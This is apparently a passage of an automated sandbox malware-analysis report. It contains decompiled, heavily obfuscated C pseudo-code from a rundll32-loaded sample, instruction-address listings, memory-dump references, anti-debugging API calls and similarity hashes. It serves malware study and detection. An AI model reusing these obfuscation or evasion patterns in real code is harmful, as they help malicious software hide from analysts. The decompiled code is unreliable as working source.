				_v72 = 0x3ef83;
				_v72 = _v72 << 3;
				_v72 = _v72 + 0xb46;
				_v72 = _v72 ^ 0x001ba742;
				_v76 = 0x4a0f2c;
				_t242 = 0x6a;
				_v76 = _v76 * 0x54;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x33e29f20;
				_v36 = 0x9fb368;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x000f389a;
				_v40 = 0x5cfe3a;
				_v40 = _v40 + 0x27ff;
				_v40 = _v40 ^ 0x005ee30c;
				_v104 = 0xfd26ea;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff1095;
				_v104 = _v104 + 0xffffd24c;
				_v104 = _v104 ^ 0xfa4b2973;
				_v80 = 0xbb493f;
				_v80 = _v80 + 0x4ae2;
				_v80 = _v80 | 0xbb4dbcb8;
				_v80 = _v80 + 0x3bc7;
				_v80 = _v80 ^ 0xbbf0b3fa;
				_v44 = 0xfc3c2e;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0xffff4208;
				_v44 = _v44 ^ 0x3c281d99;
				_v84 = 0xc50344;
				_v84 = _v84 | 0xb9ed19f4;
				_v84 = _v84 / _t242;
				_t243 = 0x6b;
				_v84 = _v84 / _t243;
				_v84 = _v84 ^ 0x000f16db;
				while(1) {
					L1:
					_t231 = 0xc3f018b;
					do {
						L2:
						while(_t267 != 0x52ffaa2) {
							if(_t267 == 0x865547f) {
								_t243 = _v88;
								_t232 = E0033CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
								_t270 =  &(_t270[2]);
								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
								__eflags = _t232;
								_t231 = 0xc3f018b;
								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t267 == 0xb133873) {
								_push(_v32);
								_t233 = E0034C3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
								_t271 =  &(_t270[4]);
								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
								__eflags = _t233;
								if(_t233 != 0) {
									E00337B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
									_push( *((intOrPtr*)(_t266 + 0x38)));
									_push(_v56);
									_push(_v52);
									_t243 = _v20;
									E00337C37(_v20, _v92);
									_t270 =  &(_t271[6]);
									_t267 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t267 == 0xb7a2405) {
									return E00349E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
								}
								if(_t267 != _t231) {
									goto L13;
								} else {
									_t233 = E003346BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00334C5D, _v104);
									_t270 =  &(_t270[0xa]);
									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
									if(_t233 == 0) {
										_t267 = 0xb7a2405;
										while(1) {
											L1:
											_t231 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t233;
						}
						_t267 = 0xb133873;
						L13:
						__eflags = _t267 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t231;
				}
			}









































                                                                                                                    0x0033b74d
                                                                                                                    0x0033b750
                                                                                                                    0x0033b755
                                                                                                                    0x0033b75d
                                                                                                                    0x0033b765
                                                                                                                    0x0033b76d
                                                                                                                    0x0033b775
                                                                                                                    0x0033b77d
                                                                                                                    0x0033b785
                                                                                                                    0x0033b78d
                                                                                                                    0x0033b792
                                                                                                                    0x0033b79a
                                                                                                                    0x0033b79f
                                                                                                                    0x0033b7a7
                                                                                                                    0x0033b7b7
                                                                                                                    0x0033b7b9
                                                                                                                    0x0033b7bf
                                                                                                                    0x0033b7c4
                                                                                                                    0x0033b7c9
                                                                                                                    0x0033b7cf
                                                                                                                    0x0033b7d7
                                                                                                                    0x0033b7e3
                                                                                                                    0x0033b7e8
                                                                                                                    0x0033b7ee
                                                                                                                    0x0033b7f6
                                                                                                                    0x0033b7fe
                                                                                                                    0x0033b803
                                                                                                                    0x0033b808
                                                                                                                    0x0033b810
                                                                                                                    0x0033b81c
                                                                                                                    0x0033b81f
                                                                                                                    0x0033b823
                                                                                                                    0x0033b82b
                                                                                                                    0x0033b833
                                                                                                                    0x0033b840
                                                                                                                    0x0033b844
                                                                                                                    0x0033b84c
                                                                                                                    0x0033b854
                                                                                                                    0x0033b85c
                                                                                                                    0x0033b864
                                                                                                                    0x0033b86c
                                                                                                                    0x0033b874
                                                                                                                    0x0033b87e
                                                                                                                    0x0033b882
                                                                                                                    0x0033b88a
                                                                                                                    0x0033b892
                                                                                                                    0x0033b89a
                                                                                                                    0x0033b8a2
                                                                                                                    0x0033b8a6
                                                                                                                    0x0033b8ae
                                                                                                                    0x0033b8b6
                                                                                                                    0x0033b8be
                                                                                                                    0x0033b8c6
                                                                                                                    0x0033b8ce
                                                                                                                    0x0033b8d6
                                                                                                                    0x0033b8de
                                                                                                                    0x0033b8e6
                                                                                                                    0x0033b8ee
                                                                                                                    0x0033b8f6
                                                                                                                    0x0033b8fe
                                                                                                                    0x0033b908
                                                                                                                    0x0033b90c
                                                                                                                    0x0033b914
                                                                                                                    0x0033b91c
                                                                                                                    0x0033b923
                                                                                                                    0x0033b930
                                                                                                                    0x0033b938
                                                                                                                    0x0033b940
                                                                                                                    0x0033b945
                                                                                                                    0x0033b94d
                                                                                                                    0x0033b955
                                                                                                                    0x0033b95a
                                                                                                                    0x0033b962
                                                                                                                    0x0033b96a
                                                                                                                    0x0033b979
                                                                                                                    0x0033b97c
                                                                                                                    0x0033b980
                                                                                                                    0x0033b985
                                                                                                                    0x0033b98d
                                                                                                                    0x0033b995
                                                                                                                    0x0033b99a
                                                                                                                    0x0033b9a2
                                                                                                                    0x0033b9aa
                                                                                                                    0x0033b9b2
                                                                                                                    0x0033b9ba
                                                                                                                    0x0033b9c2
                                                                                                                    0x0033b9c7
                                                                                                                    0x0033b9cf
                                                                                                                    0x0033b9d7
                                                                                                                    0x0033b9df
                                                                                                                    0x0033b9e7
                                                                                                                    0x0033b9ef
                                                                                                                    0x0033b9f7
                                                                                                                    0x0033b9ff
                                                                                                                    0x0033ba07
                                                                                                                    0x0033ba0f
                                                                                                                    0x0033ba14
                                                                                                                    0x0033ba1c
                                                                                                                    0x0033ba24
                                                                                                                    0x0033ba2c
                                                                                                                    0x0033ba3c
                                                                                                                    0x0033ba44
                                                                                                                    0x0033ba47
                                                                                                                    0x0033ba4b
                                                                                                                    0x0033ba53
                                                                                                                    0x0033ba53
                                                                                                                    0x0033ba53
                                                                                                                    0x0033ba58
                                                                                                                    0x00000000
                                                                                                                    0x0033ba58
                                                                                                                    0x0033ba6a
                                                                                                                    0x0033bb2d
                                                                                                                    0x0033bb31
                                                                                                                    0x0033bb36
                                                                                                                    0x0033bb39
                                                                                                                    0x0033bb3c
                                                                                                                    0x0033bb40
                                                                                                                    0x0033bb45
                                                                                                                    0x00000000
                                                                                                                    0x0033bb45
                                                                                                                    0x0033ba76
                                                                                                                    0x0033bac0
                                                                                                                    0x0033bad3
                                                                                                                    0x0033bad8
                                                                                                                    0x0033badb
                                                                                                                    0x0033bade
                                                                                                                    0x0033bae0
                                                                                                                    0x0033baf8
                                                                                                                    0x0033bafd
                                                                                                                    0x0033bb00
                                                                                                                    0x0033bb04
                                                                                                                    0x0033bb0c
                                                                                                                    0x0033bb10
                                                                                                                    0x0033bb15
                                                                                                                    0x0033bb18
                                                                                                                    0x00000000
                                                                                                                    0x0033bb18
                                                                                                                    0x0033ba78
                                                                                                                    0x0033ba7a
                                                                                                                    0x00000000
                                                                                                                    0x0033bb75
                                                                                                                    0x0033ba82
                                                                                                                    0x00000000
                                                                                                                    0x0033ba88
                                                                                                                    0x0033baa9
                                                                                                                    0x0033baae
                                                                                                                    0x0033bab1
                                                                                                                    0x0033bab6
                                                                                                                    0x0033babc
                                                                                                                    0x0033ba53
                                                                                                                    0x0033ba53
                                                                                                                    0x0033ba53
                                                                                                                    0x00000000
                                                                                                                    0x0033ba53
                                                                                                                    0x0033ba53
                                                                                                                    0x0033bab6
                                                                                                                    0x0033ba82
                                                                                                                    0x0033bb7d
                                                                                                                    0x0033bb7d
                                                                                                                    0x0033bb4d
                                                                                                                    0x0033bb52
                                                                                                                    0x0033bb52
                                                                                                                    0x0033bb52
                                                                                                                    0x00000000
                                                                                                                    0x0033ba58

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                    • API String ID: 0-1675410552
                                                                                                                    • Opcode ID: b7c7e1f0423f7bd2b9372af5ec35d7f4524759ccb17b4678adbe3ec260d95e72
                                                                                                                    • Instruction ID: 88b837ef340a8ed5d0e4f0260b98963e0c1a0587ba0a9b7693a1bbe28b1cafd6
                                                                                                                    • Opcode Fuzzy Hash: b7c7e1f0423f7bd2b9372af5ec35d7f4524759ccb17b4678adbe3ec260d95e72
                                                                                                                    • Instruction Fuzzy Hash: 29B12F724083409FC359CF65C58A40BFBF2BBC5758F108A1DF68A96260D7B5CA59CF86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2579439406-0
                                                                                                                    • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                    • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                    • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                    • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00350056 Relevance: 6.7, Strings: 5, Instructions: 443COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00350056() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				unsigned int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t500;
				void* _t502;
				intOrPtr* _t509;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				void* _t546;
				intOrPtr _t556;
				void* _t603;
				signed int _t605;
				signed int* _t609;

				_t609 =  &_v1748;
				_v1648 = 0xded5e0;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 | 0x3a1a97de;
				_v1648 = _v1648 ^ 0x3a1a9ff7;
				_v1608 = 0x6694ca;
				_v1608 = _v1608 | 0xdc2b4f48;
				_v1608 = _v1608 ^ 0x5c6fdfcb;
				_v1712 = 0x53f825;
				_v1712 = _v1712 >> 2;
				_v1712 = _v1712 ^ 0x4e440c95;
				_v1712 = _v1712 | 0x7235b0e7;
				_v1712 = _v1712 ^ 0x7e75f2fd;
				_v1632 = 0xc6d169;
				_v1568 = 0;
				_t603 = 0x9805d0a;
				_t525 = 0x52;
				_v1632 = _v1632 / _t525;
				_t526 = 0x67;
				_v1632 = _v1632 * 0x1e;
				_v1632 = _v1632 ^ 0x0048bcfb;
				_v1596 = 0x189afb;
				_v1596 = _v1596 >> 0xe;
				_v1596 = _v1596 ^ 0x000d7c1d;
				_v1724 = 0x4bfed1;
				_v1724 = _v1724 * 0x63;
				_v1724 = _v1724 * 0x55;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x61069d5d;
				_v1580 = 0x401b2b;
				_v1580 = _v1580 + 0x7090;
				_v1580 = _v1580 ^ 0x00412b45;
				_v1672 = 0xbaa782;
				_v1672 = _v1672 / _t526;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 ^ 0x000e5528;
				_v1624 = 0x1efbce;
				_t527 = 0x4f;
				_v1624 = _v1624 / _t527;
				_v1624 = _v1624 ^ 0x000dc160;
				_v1572 = 0x9ef416;
				_t605 = 0x62;
				_v1572 = _v1572 / _t605;
				_v1572 = _v1572 ^ 0x00079814;
				_v1612 = 0x4efe15;
				_t528 = 0x43;
				_v1612 = _v1612 / _t528;
				_v1612 = _v1612 ^ 0x000e5446;
				_v1640 = 0x94326d;
				_t529 = 0x77;
				_v1640 = _v1640 / _t529;
				_t530 = 0x35;
				_v1640 = _v1640 / _t530;
				_v1640 = _v1640 ^ 0x000d83b8;
				_v1676 = 0x511d41;
				_t531 = 9;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 ^ 0xeef8e480;
				_v1676 = _v1676 ^ 0xcb952f57;
				_v1708 = 0x4e0a18;
				_v1708 = _v1708 ^ 0x2110c6ad;
				_v1708 = _v1708 | 0x4a7f48ac;
				_v1708 = _v1708 + 0xffff2cb4;
				_v1708 = _v1708 ^ 0x6b758b76;
				_v1732 = 0x7a6741;
				_t123 =  &_v1732; // 0x7a6741
				_v1732 =  *_t123 / _t531;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 << 7;
				_v1732 = _v1732 ^ 0x36245548;
				_v1700 = 0x42788;
				_t532 = 0x44;
				_v1700 = _v1700 / _t532;
				_v1700 = _v1700 | 0xce808109;
				_v1700 = _v1700 + 0xffff7a0f;
				_v1700 = _v1700 ^ 0xce88d2ed;
				_v1740 = 0x39c25c;
				_v1740 = _v1740 + 0xf71;
				_t533 = 0x75;
				_v1740 = _v1740 / _t533;
				_v1740 = _v1740 ^ 0xc60840fd;
				_v1740 = _v1740 ^ 0xc60d36f5;
				_v1716 = 0x2bcc6c;
				_v1716 = _v1716 + 0x97be;
				_v1716 = _v1716 >> 0xd;
				_v1716 = _v1716 ^ 0xcb020dbc;
				_v1716 = _v1716 ^ 0xcb05808e;
				_v1604 = 0x3f7ac0;
				_v1604 = _v1604 + 0xafc6;
				_v1604 = _v1604 ^ 0x0048c4ef;
				_v1576 = 0x9f011d;
				_v1576 = _v1576 ^ 0x8bb25c52;
				_v1576 = _v1576 ^ 0x8b2a60ae;
				_v1684 = 0xe4045e;
				_v1684 = _v1684 * 0x42;
				_v1684 = _v1684 * 0xc;
				_v1684 = _v1684 ^ 0xc16ccb70;
				_v1720 = 0x76be5;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 * 0x3b;
				_v1720 = _v1720 + 0xffffaa4e;
				_v1720 = _v1720 ^ 0xfff1ea6d;
				_v1680 = 0x1fb4c3;
				_v1680 = _v1680 << 4;
				_v1680 = _v1680 << 0xc;
				_v1680 = _v1680 ^ 0xb4c6c556;
				_v1644 = 0xb0dbcd;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 << 0x10;
				_v1644 = _v1644 ^ 0x800a09c5;
				_v1600 = 0x1a67e8;
				_v1600 = _v1600 | 0xeb4b5744;
				_v1600 = _v1600 ^ 0xeb54c7c0;
				_v1652 = 0x1784b1;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 ^ 0x00082079;
				_v1660 = 0xec7770;
				_v1660 = _v1660 + 0xb190;
				_v1660 = _v1660 | 0x400c0cca;
				_v1660 = _v1660 ^ 0x40ee2104;
				_v1668 = 0xfc9259;
				_v1668 = _v1668 + 0xffffc6b7;
				_v1668 = _v1668 >> 0xe;
				_v1668 = _v1668 ^ 0x000f272a;
				_v1704 = 0xff7fae;
				_v1704 = _v1704 + 0xffff711f;
				_v1704 = _v1704 + 0xffff4b94;
				_v1704 = _v1704 | 0x5a3393fe;
				_v1704 = _v1704 ^ 0x5af53198;
				_v1616 = 0x130067;
				_t534 = 0x4e;
				_v1616 = _v1616 / _t534;
				_v1616 = _v1616 ^ 0x00057283;
				_v1628 = 0x10552;
				_v1628 = _v1628 + 0xf3cd;
				_v1628 = _v1628 + 0x9e6e;
				_v1628 = _v1628 ^ 0x00033ec8;
				_v1636 = 0x95cc92;
				_v1636 = _v1636 >> 0xf;
				_v1636 = _v1636 + 0x9761;
				_v1636 = _v1636 ^ 0x000e6713;
				_v1748 = 0xd7b406;
				_t535 = 0x31;
				_v1748 = _v1748 * 0x46;
				_v1748 = _v1748 << 1;
				_v1748 = _v1748 + 0x479a;
				_v1748 = _v1748 ^ 0x75ff50ef;
				_v1584 = 0xe29275;
				_v1584 = _v1584 * 0x6d;
				_v1584 = _v1584 ^ 0x607f0d3c;
				_v1664 = 0xc2b99a;
				_v1664 = _v1664 / _t605;
				_v1664 = _v1664 | 0xc7d1021c;
				_v1664 = _v1664 ^ 0xc7dc1815;
				_v1692 = 0xa5d2da;
				_v1692 = _v1692 * 0x17;
				_v1692 = _v1692 / _t535;
				_t536 = 0x23;
				_v1692 = _v1692 * 0x3a;
				_v1692 = _v1692 ^ 0x11a891cb;
				_v1656 = 0x680db3;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x000507e8;
				_v1728 = 0x12970f;
				_v1728 = _v1728 + 0xffffbe66;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 / _t536;
				_v1728 = _v1728 ^ 0x00053169;
				_v1620 = 0xa87d1b;
				_v1620 = _v1620 + 0xc3ba;
				_v1620 = _v1620 ^ 0x00a7b1ac;
				_v1736 = 0xb206b7;
				_v1736 = _v1736 ^ 0x6f4eb888;
				_t537 = 0x5d;
				_v1736 = _v1736 / _t537;
				_v1736 = _v1736 + 0x173b;
				_v1736 = _v1736 ^ 0x013191a0;
				_v1744 = 0xbf67a7;
				_t538 = 0x70;
				_v1744 = _v1744 / _t538;
				_v1744 = _v1744 | 0x1279871b;
				_v1744 = _v1744 ^ 0x04c3b9b8;
				_v1744 = _v1744 ^ 0x16b0fef0;
				_v1588 = 0x7bc48a;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x3de90636;
				_v1688 = 0x5dc5eb;
				_v1688 = _v1688 >> 0xb;
				_v1688 = _v1688 + 0xaf87;
				_t539 = 0x6c;
				_t522 = _v1568;
				_v1688 = _v1688 * 0x63;
				_v1688 = _v1688 ^ 0x004fac27;
				_v1696 = 0x311285;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x3061b352;
				_v1696 = _v1696 / _t539;
				_v1696 = _v1696 ^ 0x01b73771;
				_v1592 = 0x977507;
				_v1592 = _v1592 | 0xf9843f0d;
				_v1592 = _v1592 ^ 0xf99a58c3;
				while(1) {
					L1:
					_t540 = 0x5c;
					while(1) {
						L2:
						_t500 = 0x8167d85;
						do {
							L3:
							if(_t603 == 0x2c7b186) {
								E00331FD1(_v1688, _v1696, _v1592, _v1564);
								_t603 = 0xcf98960;
								goto L18;
							} else {
								if(_t603 == 0x33b45b1) {
									_push(_v1680);
									_push(_v1720);
									_t502 = E0034DCF7(_v1684, 0x331080, __eflags);
									_pop(_t546);
									__eflags = E0033AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
									E0033A8B0(_v1628, _t502, _v1636);
									_t609 =  &(_t609[0xf]);
									L18:
									_t500 = 0x8167d85;
									_t540 = 0x5c;
								} else {
									if(_t603 == _t500) {
										_t509 = E0033F002(2 + E0033CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0033CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
										_t609 =  &(_t609[0xd]);
										__eflags = _t509;
										_t603 = 0x2c7b186;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t603 == 0x9805d0a) {
											_push(_v1672);
											_push(_v1648);
											_push(_v1580);
											_push( &_v520);
											E003446BB(_v1596, _v1724);
											_t609 = _t609 - 0xc + 0x1c;
											_t603 = 0xc81d40c;
											while(1) {
												L1:
												_t540 = 0x5c;
												goto L2;
											}
										} else {
											if(_t603 == 0xaea35f7) {
												_t523 =  *0x353e10; // 0x0
												_t524 = _t523 + 0x1c;
												while(1) {
													__eflags =  *_t524 - _t540;
													if(__eflags == 0) {
														break;
													}
													_t524 = _t524 + 2;
													__eflags = _t524;
												}
												_t522 = _t524 + 2;
												_t603 = 0x33b45b1;
												goto L2;
											} else {
												_t618 = _t603 - 0xc81d40c;
												if(_t603 == 0xc81d40c) {
													_push(_v1612);
													_push(_v1572);
													_t513 = E0034DCF7(_v1624, 0x331020, _t618);
													E0034176B( &_v1040, _t618);
													_t556 =  *0x353e10; // 0x0
													_t403 = _t556 + 0x1c; // 0x1c
													_t404 = _t556 + 0x23c; // 0x23c
													E00341652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
													E0033A8B0(_v1604, _t513, _v1576);
													_t609 =  &(_t609[0xf]);
													_t603 = 0xaea35f7;
													while(1) {
														L1:
														_t540 = 0x5c;
														L2:
														_t500 = 0x8167d85;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t603 - 0xcf98960;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

















































































                                                                                                                    0x00350056
                                                                                                                    0x0035005c
                                                                                                                    0x00350066
                                                                                                                    0x0035006d
                                                                                                                    0x00350075
                                                                                                                    0x0035007d
                                                                                                                    0x00350088
                                                                                                                    0x00350093
                                                                                                                    0x0035009e
                                                                                                                    0x003500a6
                                                                                                                    0x003500ab
                                                                                                                    0x003500b3
                                                                                                                    0x003500bb
                                                                                                                    0x003500c3
                                                                                                                    0x003500cf
                                                                                                                    0x003500d6
                                                                                                                    0x003500e4
                                                                                                                    0x003500e9
                                                                                                                    0x003500fa
                                                                                                                    0x003500fd
                                                                                                                    0x00350104
                                                                                                                    0x0035010f
                                                                                                                    0x0035011a
                                                                                                                    0x00350122
                                                                                                                    0x0035012d
                                                                                                                    0x0035013a
                                                                                                                    0x00350143
                                                                                                                    0x00350147
                                                                                                                    0x0035014b
                                                                                                                    0x00350153
                                                                                                                    0x0035015e
                                                                                                                    0x00350169
                                                                                                                    0x00350174
                                                                                                                    0x00350184
                                                                                                                    0x00350188
                                                                                                                    0x0035018d
                                                                                                                    0x00350195
                                                                                                                    0x003501a7
                                                                                                                    0x003501ac
                                                                                                                    0x003501b5
                                                                                                                    0x003501c0
                                                                                                                    0x003501d2
                                                                                                                    0x003501d7
                                                                                                                    0x003501e0
                                                                                                                    0x003501eb
                                                                                                                    0x003501fd
                                                                                                                    0x00350202
                                                                                                                    0x0035020b
                                                                                                                    0x00350216
                                                                                                                    0x00350228
                                                                                                                    0x0035022b
                                                                                                                    0x00350237
                                                                                                                    0x0035023c
                                                                                                                    0x00350245
                                                                                                                    0x00350250
                                                                                                                    0x0035025d
                                                                                                                    0x00350260
                                                                                                                    0x00350264
                                                                                                                    0x0035026c
                                                                                                                    0x00350274
                                                                                                                    0x0035027c
                                                                                                                    0x00350284
                                                                                                                    0x0035028c
                                                                                                                    0x00350294
                                                                                                                    0x0035029c
                                                                                                                    0x003502a4
                                                                                                                    0x003502ac
                                                                                                                    0x003502b0
                                                                                                                    0x003502b5
                                                                                                                    0x003502ba
                                                                                                                    0x003502c2
                                                                                                                    0x003502ce
                                                                                                                    0x003502d3
                                                                                                                    0x003502d9
                                                                                                                    0x003502e1
                                                                                                                    0x003502e9
                                                                                                                    0x003502f1
                                                                                                                    0x003502f9
                                                                                                                    0x00350305
                                                                                                                    0x00350308
                                                                                                                    0x0035030c
                                                                                                                    0x00350314
                                                                                                                    0x0035031c
                                                                                                                    0x00350324
                                                                                                                    0x0035032c
                                                                                                                    0x00350331
                                                                                                                    0x00350339
                                                                                                                    0x00350341
                                                                                                                    0x0035034c
                                                                                                                    0x00350357
                                                                                                                    0x00350362
                                                                                                                    0x0035036d
                                                                                                                    0x00350378
                                                                                                                    0x00350383
                                                                                                                    0x00350390
                                                                                                                    0x00350399
                                                                                                                    0x0035039d
                                                                                                                    0x003503a5
                                                                                                                    0x003503ad
                                                                                                                    0x003503b7
                                                                                                                    0x003503bb
                                                                                                                    0x003503c3
                                                                                                                    0x003503cb
                                                                                                                    0x003503d3
                                                                                                                    0x003503d8
                                                                                                                    0x003503dd
                                                                                                                    0x003503e5
                                                                                                                    0x003503ed
                                                                                                                    0x003503f2
                                                                                                                    0x003503f7
                                                                                                                    0x003503ff
                                                                                                                    0x0035040a
                                                                                                                    0x00350415
                                                                                                                    0x00350422
                                                                                                                    0x0035042a
                                                                                                                    0x0035042f
                                                                                                                    0x00350434
                                                                                                                    0x0035043c
                                                                                                                    0x00350444
                                                                                                                    0x0035044c
                                                                                                                    0x00350454
                                                                                                                    0x0035045c
                                                                                                                    0x00350464
                                                                                                                    0x0035046c
                                                                                                                    0x00350471
                                                                                                                    0x00350479
                                                                                                                    0x00350481
                                                                                                                    0x00350489
                                                                                                                    0x00350491
                                                                                                                    0x00350499
                                                                                                                    0x003504a1
                                                                                                                    0x003504b5
                                                                                                                    0x003504ba
                                                                                                                    0x003504c1
                                                                                                                    0x003504cc
                                                                                                                    0x003504d7
                                                                                                                    0x003504e2
                                                                                                                    0x003504ed
                                                                                                                    0x003504f8
                                                                                                                    0x00350503
                                                                                                                    0x0035050b
                                                                                                                    0x00350516
                                                                                                                    0x00350521
                                                                                                                    0x00350530
                                                                                                                    0x00350533
                                                                                                                    0x00350537
                                                                                                                    0x0035053b
                                                                                                                    0x00350543
                                                                                                                    0x0035054b
                                                                                                                    0x0035055e
                                                                                                                    0x00350565
                                                                                                                    0x00350570
                                                                                                                    0x00350580
                                                                                                                    0x00350584
                                                                                                                    0x0035058c
                                                                                                                    0x00350594
                                                                                                                    0x003505a1
                                                                                                                    0x003505ad
                                                                                                                    0x003505b6
                                                                                                                    0x003505b7
                                                                                                                    0x003505bb
                                                                                                                    0x003505c3
                                                                                                                    0x003505cb
                                                                                                                    0x003505d0
                                                                                                                    0x003505d5
                                                                                                                    0x003505dd
                                                                                                                    0x003505e5
                                                                                                                    0x003505ed
                                                                                                                    0x003505f8
                                                                                                                    0x003505fc
                                                                                                                    0x00350604
                                                                                                                    0x0035060f
                                                                                                                    0x0035061a
                                                                                                                    0x00350625
                                                                                                                    0x0035062d
                                                                                                                    0x00350642
                                                                                                                    0x00350647
                                                                                                                    0x0035064d
                                                                                                                    0x00350655
                                                                                                                    0x0035065d
                                                                                                                    0x00350669
                                                                                                                    0x0035066e
                                                                                                                    0x00350674
